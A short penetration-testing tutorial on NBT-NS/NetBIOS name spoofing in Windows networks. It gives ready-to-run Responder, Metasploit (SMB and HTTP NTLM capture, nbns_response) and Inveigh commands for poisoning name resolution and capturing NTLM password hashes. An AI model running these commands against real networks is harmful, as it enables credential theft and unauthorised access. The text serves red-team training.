Netbios Name Service (NBT-NS) is used in Windows networks for communication between hosts. Systems will use this service when resolving names over LHOSTS and DNS fail. Abusing this service to perform a Man-in-the-middle attack is a common tactic that has been widely used by penetration testers and red teamers to gain initial foothold inside a system. The retrieved password hashes can be cracked offline or can be used in conjunction with a relay attack to achieve legitimate access into hosts.
Trustwave SpiderLabs developed Responder to implement the NBNS spoofing attack. Running the tool with the following arguments will initiate the poisoning against various protocols that require authentication such as SMB, HTTP etc.
responder -I eth0 -e 10.0.0.2 -b -A -v
When a host in the network sent a NetBIOS broadcast the machine of the attacker will sent a fake reply and the host will attempt to authenticate to a resource using the NTLM password hash.
NBNS Spoofing can be implemented through Metasploit Framework by using a variety of modules that can capture the negotiate authentication challenge for protocols such as SMB and HTTP. For capturing the password hash over SMB the following module needs to be used:
use auxiliary/server/capture/smb set SRVHOST 10.0.0.2 set cainpwfile /tmp/cain-smb set johnpwfile /tmp/john-smb set logfile /tmp/logfile run
The module for capturing the NTLM authentication challenge over HTTP can be configured as below:
use auxiliary/server/capture/http_ntlm set SRVHOST 10.0.0.2 set SRVPORT 80 set URIPATH / set cainpwfile /tmp/cain-http set johnpwfile /tmp/john-http set logfile /tmp/logfile run
The following module will sent the NetBIOS name service responses to the hosts that will sent NetBIOS broadcast requests over the network.
use auxiliary/spoof/nbns/nbns_response set SPOOFIP 10.0.0.2 run
When a network user will attempt to use the NetBIOS broadcast request to identify a resource the traffic will redirected to the attacker host and the password hash will be captured.
Kevin Robertson implemented this attack in a PowerShell script called Inveigh. This script is part of Empire, PoshC2 and other tools and can be configured as follows:
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y
The password hash of the user will be captured like Responder and Metasploit.